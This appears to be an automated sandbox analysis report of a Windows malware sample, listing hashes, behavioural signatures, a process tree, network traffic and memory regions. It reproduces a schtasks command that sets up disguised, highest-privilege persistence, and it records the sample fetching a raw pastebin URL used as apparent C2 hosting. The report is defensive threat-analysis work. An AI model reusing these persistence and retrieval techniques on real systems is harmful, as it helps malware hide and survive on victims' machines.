Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/03/2024, 22:27 UTC

General

  • Target

    c443e51bf4e611c69c8dc61af63e5bb9.exe

  • Size

    506KB

  • MD5

    c443e51bf4e611c69c8dc61af63e5bb9

  • SHA1

    ae135b02a8a9ca36493be479994ccc1f458dc7ac

  • SHA256

    186077cdf16112f470f0dd4bc892f52879cf472be0107ebc0ccab33ae5cb0e03

  • SHA512

    9a20af1712a69a176d80edb4ed6a0cb508dcffae092f690df1c7806dc6464763e22358ddd2f9769130182e5c9a8ac03a04886ff31786e72be12908cd5d33060b

  • SSDEEP

    12288:44nC4MC1rb6/bTJ+YFYN439yTsIfD9D1ssBDJzUTVQHVX:44CfIWvV9QNOspCTVy

Score
7/10

Malware Config

Signatures

  • Deletes itself (1 IoC)
  • Executes dropped EXE (1 IoC)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Creates scheduled task(s) (1 TTP, 1 IoC)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious behavior: RenamesItself (1 IoC)
  • Suspicious use of UnmapMainImage (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe"
    • Suspicious behavior: RenamesItself
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe
      • Deletes itself
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks.exe /CREATE /RL HIGHEST /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe" /TN Google_Trk_Updater /F
        • Creates scheduled task(s)
        PID:1372

Network

  • DNS (US)
    133.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.32.126.40.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    0.204.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.204.248.87.in-addr.arpa
    IN PTR
    Response
    0.204.248.87.in-addr.arpa
    IN PTR
    https-87-248-204-0.lhr.llnw.net
  • DNS (US)
    www.HWQ4EtOwHW.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    www.HWQ4EtOwHW.com
    IN A
    Response
  • DNS (US)
    w.google.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    w.google.com
    IN A
    Response
    w.google.com
    IN CNAME
    www3.l.google.com
    www3.l.google.com
    IN A
    142.250.179.206
  • GET (NL)
    http://w.google.com/
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    142.250.179.206:80
    Request
    GET / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: w.google.com
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1561
    Date: Tue, 12 Mar 2024 22:28:07 GMT
  • DNS (US)
    pastebin.com
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.68.143
    pastebin.com
    IN A
    104.20.67.143
    pastebin.com
    IN A
    172.67.34.170
  • DNS (US)
    206.179.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.179.250.142.in-addr.arpa
    IN PTR
    Response
    206.179.250.142.in-addr.arpa
    IN PTR
    ams15s42-in-f14.1e100.net
  • GET (US)
    http://pastebin.com/raw/ubFNTPjt
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    104.20.68.143:80
    Request
    GET /raw/ubFNTPjt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: pastebin.com
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 12 Mar 2024 22:28:07 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 12 Mar 2024 23:28:07 GMT
    Location: https://pastebin.com/raw/ubFNTPjt
    Server: cloudflare
    CF-RAY: 8637372a0f785324-LHR
  • GET (US)
    https://pastebin.com/raw/ubFNTPjt
    c443e51bf4e611c69c8dc61af63e5bb9.exe
    Remote address:
    104.20.68.143:443
    Request
    GET /raw/ubFNTPjt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*, ???@, ??????????????
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Host: pastebin.com
    Response
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Mar 2024 22:28:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 4
    Server: cloudflare
    CF-RAY: 8637372e9e1f632b-LHR
  • DNS (US)
    143.68.20.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    143.68.20.104.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41.deploy.static.akamaitechnologies.com
  • DNS (US)
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
  • DNS (US)
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    81.171.91.138.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.171.91.138.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0.lgw.llnw.net
  • DNS (US)
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173.deploy.static.akamaitechnologies.com
  • DNS (US)
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 279056
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8F43E814060F4D3FABD2E86C7E6E9758 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 393346
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5EEDA7E715934C6ABE612C3D5A5FDCCA Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 258506
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D3F0A48A84E54AB6AC390846C691FD71 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:49Z
    date: Tue, 12 Mar 2024 22:29:49 GMT
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 89146
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5A9DB69965374E999E9E7D9CE99E23C4 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:50Z
    date: Tue, 12 Mar 2024 22:29:50 GMT
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 483933
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6D07A0418B9B4039B16137D561B39C5F Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:52Z
    date: Tue, 12 Mar 2024 22:29:52 GMT
  • GET (US)
    https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 78844
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89AD8E94A96A4A67AD178422A1174BF6 Ref B: LON04EDGE0818 Ref C: 2024-03-12T22:29:53Z
    date: Tue, 12 Mar 2024 22:29:53 GMT
  • DNS (US)
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001.a-msedge.net
  • DNS (US)
    122.10.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.10.44.20.in-addr.arpa
    IN PTR
    Response
  • DNS (US)
    122.10.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.10.44.20.in-addr.arpa
    IN PTR
    Response
Connections (columns: remote address | domain or URL | protocols | process | bytes sent | bytes received | packets sent | packets received; the HTTP and DNS exchanges carried by each connection are listed beneath it)

  • 142.250.179.206:80 | http://w.google.com/ | http | c443e51bf4e611c69c8dc61af63e5bb9.exe | 462 B | 1.9kB | 5 | 4
      HTTP Request: GET http://w.google.com/
      HTTP Response: 404
  • 104.20.68.143:80 | http://pastebin.com/raw/ubFNTPjt | http | c443e51bf4e611c69c8dc61af63e5bb9.exe | 474 B | 424 B | 5 | 3
      HTTP Request: GET http://pastebin.com/raw/ubFNTPjt
      HTTP Response: 301
  • 104.20.68.143:443 | https://pastebin.com/raw/ubFNTPjt | tls, http | c443e51bf4e611c69c8dc61af63e5bb9.exe | 1.6kB | 4.9kB | 11 | 9
      HTTP Request: GET https://pastebin.com/raw/ubFNTPjt
      HTTP Response: 404
  • 204.79.197.200:443 | tse1.mm.bing.net | tls, http2 | - | 1.5kB | 8.1kB | 17 | 14
  • 204.79.197.200:443 | tse1.mm.bing.net | tls, http2 | - | 1.7kB | 549 B | 12 | 7
  • 204.79.197.200:443 | tse1.mm.bing.net | tls, http2 | - | 1.6kB | 549 B | 14 | 7
  • 204.79.197.200:443 | tse1.mm.bing.net | tls, http2 | - | 1.2kB | 8.1kB | 16 | 14
  • 204.79.197.200:443 | https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4 | tls, http2 | - | 60.4kB | 1.6MB | 1209 | 1200
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301576_1P4YPBOHIENGSX86I&pid=21.2&w=1080&h=1920&c=4
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301167_10EF6H5QJP57ZPZOD&pid=21.2&w=1920&h=1080&c=4
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4
      HTTP Response: 200
      HTTP Response: 200
      HTTP Response: 200
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388213_1WCQ3PJBBE0FIXEBL&pid=21.2&w=1080&h=1920&c=4
      HTTP Response: 200
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4
      HTTP Response: 200
      HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388212_1DTNU2NAFQGIU7JBO&pid=21.2&w=1920&h=1080&c=4
      HTTP Response: 200
  • 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | dns | - | 72 B | 158 B | 1 | 1
      DNS Request: 133.32.126.40.in-addr.arpa
  • 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | dns | - | 70 B | 156 B | 1 | 1
      DNS Request: 9.228.82.20.in-addr.arpa
  • 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | dns | - | 71 B | 157 B | 1 | 1
      DNS Request: 13.86.106.20.in-addr.arpa
  • 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | dns | - | 71 B | 116 B | 1 | 1
      DNS Request: 0.204.248.87.in-addr.arpa
  • 8.8.8.8:53 | www.HWQ4EtOwHW.com | dns | c443e51bf4e611c69c8dc61af63e5bb9.exe | 64 B | 137 B | 1 | 1
      DNS Request: www.HWQ4EtOwHW.com
  • 8.8.8.8:53 | w.google.com | dns | c443e51bf4e611c69c8dc61af63e5bb9.exe | 58 B | 95 B | 1 | 1
      DNS Request: w.google.com
      DNS Response: 142.250.179.206
  • 8.8.8.8:53 | pastebin.com | dns | c443e51bf4e611c69c8dc61af63e5bb9.exe | 58 B | 106 B | 1 | 1
      DNS Request: pastebin.com
      DNS Response: 104.20.68.143, 104.20.67.143, 172.67.34.170
  • 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | dns | - | 74 B | 113 B | 1 | 1
      DNS Request: 206.179.250.142.in-addr.arpa
  • 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | dns | - | 72 B | 134 B | 1 | 1
      DNS Request: 143.68.20.104.in-addr.arpa
  • 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | dns | - | 71 B | 135 B | 1 | 1
      DNS Request: 41.110.16.96.in-addr.arpa
  • 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | dns | - | 72 B | 158 B | 1 | 1
      DNS Request: 28.118.140.52.in-addr.arpa
  • 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | dns | - | 146 B | 159 B | 2 | 1
      DNS Request: 228.249.119.40.in-addr.arpa
      DNS Request: 228.249.119.40.in-addr.arpa
  • 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | dns | - | 72 B | 146 B | 1 | 1
      DNS Request: 81.171.91.138.in-addr.arpa
  • 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | dns | - | 72 B | 146 B | 1 | 1
      DNS Request: 26.165.165.52.in-addr.arpa
  • 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | dns | - | 72 B | 158 B | 1 | 1
      DNS Request: 171.39.242.20.in-addr.arpa
  • 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | dns | - | 71 B | 116 B | 1 | 1
      DNS Request: 0.205.248.87.in-addr.arpa
  • 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | dns | - | 72 B | 137 B | 1 | 1
      DNS Request: 173.178.17.96.in-addr.arpa
  • 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | dns | - | 71 B | 157 B | 1 | 1
      DNS Request: 57.169.31.20.in-addr.arpa
  • 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | dns | - | 72 B | 158 B | 1 | 1
      DNS Request: 23.236.111.52.in-addr.arpa
  • 8.8.8.8:53 | tse1.mm.bing.net | dns | - | 62 B | 173 B | 1 | 1
      DNS Request: tse1.mm.bing.net
      DNS Response: 204.79.197.200, 13.107.21.200
  • 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | dns | - | 71 B | 157 B | 1 | 1
      DNS Request: 55.36.223.20.in-addr.arpa
  • 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | dns | - | 73 B | 106 B | 1 | 1
      DNS Request: 200.197.79.204.in-addr.arpa
  • 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | dns | - | 142 B | 290 B | 2 | 2
      DNS Request: 122.10.44.20.in-addr.arpa
      DNS Request: 122.10.44.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\c443e51bf4e611c69c8dc61af63e5bb9.exe

    Filesize

    506KB

    MD5

    9da25b89d9682c4f2c8595bfdde984d9

    SHA1

    1be8408709348b0942fbf25432736de967e77223

    SHA256

    3f008f99475e88cc71e92beb105a3f68c6c63538abb4021462ba3340a9e48e62

    SHA512

    7bef9dabf3fd9fbef240456c41536e26d25bc1b9b6842abf6130d3ee374af517044a8d2149e4267c0ed276544f70727b2b92161c4e074df50a124976e5fc921e

  • memory/2744-13-0x0000000000400000-0x0000000000483000-memory.dmp

    Filesize

    524KB

  • memory/2744-17-0x0000000000160000-0x00000000001E3000-memory.dmp

    Filesize

    524KB

  • memory/2744-20-0x0000000004F80000-0x0000000004FFE000-memory.dmp

    Filesize

    504KB

  • memory/2744-21-0x0000000000400000-0x000000000045B000-memory.dmp

    Filesize

    364KB

  • memory/2744-27-0x0000000000400000-0x000000000045B000-memory.dmp

    Filesize

    364KB

  • memory/4648-0-0x0000000000400000-0x0000000000483000-memory.dmp

    Filesize

    524KB

  • memory/4648-1-0x0000000001510000-0x0000000001593000-memory.dmp

    Filesize

    524KB

  • memory/4648-2-0x0000000000400000-0x000000000047E000-memory.dmp

    Filesize

    504KB

  • memory/4648-11-0x0000000000400000-0x000000000047E000-memory.dmp

    Filesize

    504KB